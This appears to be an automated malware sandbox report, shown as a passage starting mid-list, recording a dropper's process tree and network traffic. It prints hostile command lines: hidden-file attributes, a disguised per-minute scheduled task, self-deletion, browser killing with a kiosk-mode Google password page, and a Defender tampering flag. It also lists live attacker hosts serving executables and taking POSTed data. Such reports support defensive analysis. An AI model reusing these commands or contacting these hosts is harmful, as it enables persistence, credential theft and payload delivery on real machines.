wrote to memory of 2068 1936 cmd.exe 38 PID 1936 wrote to memory of 2068 1936 cmd.exe 38 PID 1936 wrote to memory of 1984 1936 cmd.exe 39 PID 1936 wrote to memory of 1984 1936 cmd.exe 39 PID 1936 wrote to memory of 1984 1936 cmd.exe 39 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1936 wrote to memory of 1920 1936 cmd.exe 40 PID 1936 wrote to memory of 840 1936 cmd.exe 41 PID 1936 wrote to memory of 840 1936 cmd.exe 41 PID 1936 wrote to memory of 840 1936 cmd.exe 41 PID 2872 wrote to memory of 1868 2872 skotes.exe 42 PID 2872 wrote to memory of 1868 2872 skotes.exe 42 PID 2872 wrote to memory of 1868 2872 skotes.exe 42 PID 2872 wrote to memory of 1868 2872 skotes.exe 42 PID 1936 wrote to memory of 2528 1936 cmd.exe 44 PID 1936 wrote to memory of 2528 1936 cmd.exe 44 PID 1936 wrote to memory of 2528 1936 cmd.exe 44 PID 1936 wrote to memory of 1804 1936 cmd.exe 45 PID 1936 wrote to memory of 1804 1936 cmd.exe 45 PID 1936 wrote to memory of 1804 1936 cmd.exe 45 PID 1936 wrote to memory of 3068 1936 cmd.exe 46 PID 1936 wrote to memory of 3068 1936 cmd.exe 46 PID 1936 wrote to memory of 3068 1936 cmd.exe 46 PID 1936 wrote to memory of 1796 1936 cmd.exe 47 PID 1936 wrote to memory of 1796 1936 cmd.exe 47 PID 1936 wrote to memory of 1796 1936 cmd.exe 47 PID 1936 wrote to memory of 1656 1936 cmd.exe 48 PID 1936 wrote to memory of 1656 1936 cmd.exe 48 PID 1936 wrote to memory of 1656 1936 cmd.exe 48 PID 1656 wrote to memory of 2960 1656 in.exe 49 PID 1656 wrote to memory of 2960 1656 in.exe 49 PID 1656 wrote to memory of 2960 1656 in.exe 49 PID 1656 wrote to memory of 2264 1656 in.exe 50 PID 1656 wrote to memory of 2264 1656 in.exe 50 PID 1656 wrote to memory of 2264 1656 in.exe 50 PID 1656 wrote to memory of 1784 1656 in.exe 51 PID 1656 wrote to memory of 1784 1656 in.exe 51 PID 1656 wrote to memory of 1784 1656 in.exe 51 PID 1656 wrote to memory of 1816 1656 in.exe 52 PID 1656 wrote to memory of 1816 1656 in.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1796 attrib.exe 2264 attrib.exe 2960 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe"C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe"C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 444⤵
- Loads dropped DLL
- Program crash
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe"C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\mode.commode 65,105⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"5⤵
- Views/modifies file attributes
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:2960
-
-
C:\Windows\system32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:2264
-
-
C:\Windows\system32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE6⤵
- Scheduled Task/Job: Scheduled Task
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2384
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe"C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe" & rd /s /q "C:\ProgramData\BIMO8YMO89RQ" & exit4⤵
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe"C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe"C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2348 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1368
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1860 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.0.1983739428\1088985320" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1092 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d832464-d7db-432a-8f81-ac16bfbda947} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1316 106d3458 gpu6⤵PID:2952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.1.1829025502\1735701162" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ade151c6-d829-4e47-b4d9-ecd242ea824a} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1548 f3ec158 socket6⤵PID:664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.2.557416954\589131999" -childID 1 -isForBrowser -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee70d7e9-dbd6-4efe-aea6-00acd2a11cda} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2056 1065e758 tab6⤵PID:1524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.3.1135025671\1179398381" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53ece92e-d407-4e28-9f15-f56a60771bf2} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2780 e64258 tab6⤵PID:2644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.4.1840816558\1387757752" -childID 3 -isForBrowser -prefsHandle 3768 -prefMapHandle 3764 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66428f64-dd1a-4c27-b89a-21932258a8d0} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3780 174acd58 tab6⤵PID:1784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.5.1481086733\2094245306" -childID 4 -isForBrowser -prefsHandle 3892 -prefMapHandle 3896 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {077571cb-4d47-4627-a064-9bb94643dfd3} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3880 1f50aa58 tab6⤵PID:1376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.6.1072565005\38282309" -childID 5 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5756a53-30c8-4c61-8575-5813d1314b06} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 4036 1f509858 tab6⤵PID:2896
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe"C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe"C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe"C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3372
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {36DD6E4C-3FE4-4BF8-9B1A-EB67400EE262} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Windows\explorer.exeexplorer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe3⤵
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3048
-
-
-
-
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exeC:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3972 -
C:\Windows\explorer.exeexplorer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe3⤵
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.10.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3764
-
-
-
Network
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:31.41.244.11:80RequestGET /files/6904700471/9JTVo50.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:03 GMT
Content-Type: application/octet-stream
Content-Length: 2660864
Last-Modified: Thu, 12 Dec 2024 23:33:41 GMT
Connection: keep-alive
ETag: "675b72d5-289a00"
Accept-Ranges: bytes
-
Remote address:31.41.244.11:80RequestGET /files/burpin1/random.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:07 GMT
Content-Type: application/octet-stream
Content-Length: 4438776
Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
Connection: keep-alive
ETag: "675784f0-43baf8"
Accept-Ranges: bytes
-
Remote address:31.41.244.11:80RequestGET /files/fate/random.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:13 GMT
Content-Type: application/octet-stream
Content-Length: 727552
Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
Connection: keep-alive
ETag: "67594bc0-b1a00"
Accept-Ranges: bytes
-
Remote address:31.41.244.11:80RequestGET /files/encoxx/random.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:16 GMT
Content-Type: application/octet-stream
Content-Length: 393728
Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
Connection: keep-alive
ETag: "675a96d4-60200"
Accept-Ranges: bytes
-
Remote address:31.41.244.11:80RequestGET /files/hell911/random.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:19 GMT
Content-Type: application/octet-stream
Content-Length: 2660864
Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT
Connection: keep-alive
ETag: "675b72d4-289a00"
Accept-Ranges: bytes
-
Remote address:31.41.244.11:80RequestGET /files/unique2/random.exe HTTP/1.1
Host: 31.41.244.11
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:38 GMT
Content-Type: application/octet-stream
Content-Length: 1994240
Last-Modified: Fri, 13 Dec 2024 00:01:44 GMT
Connection: keep-alive
ETag: "675b7968-1e6e00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestdrive-connect.cyouIN AResponsedrive-connect.cyouIN A172.67.139.78drive-connect.cyouIN A104.21.79.7
-
Remote address:172.67.139.78:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: drive-connect.cyou
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8a4t0mgre7apvskvv9so9bsntu; expires=Mon, 07-Apr-2025 17:53:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8CWn168P3e82XdnH%2F12FJ5VPzOPTFR%2Fq1bn1WKirCO2aW%2B8swfTtytzgtBdJKNGDWcwlhhLdJptX2dD1jZRIWDKoOVCxIcCW%2F0fXnRapXsm8ns4BGzLDv%2F1H6a2fb84qITzgp4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f11b69d5f014183-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39832&min_rtt=26344&rtt_var=32243&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=133013&cwnd=252&unsent_bytes=0&cid=4fd11670ede3237d&ts=360&x=0"
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:8.8.8.8:53Requeststeamcommunity.comIN AResponsesteamcommunity.comIN A23.214.143.155
-
Remote address:23.214.143.155:443RequestGET /profiles/76561199807592927 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 13 Dec 2024 00:07:19 GMT
Content-Length: 35248
Connection: keep-alive
Set-Cookie: sessionid=7cb1ab653246d2d58adad597; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:95.216.181.44:443RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:95.216.181.44:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PHVAI5F3EKF37QQQI5XL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: 95.216.181.44
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:07:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
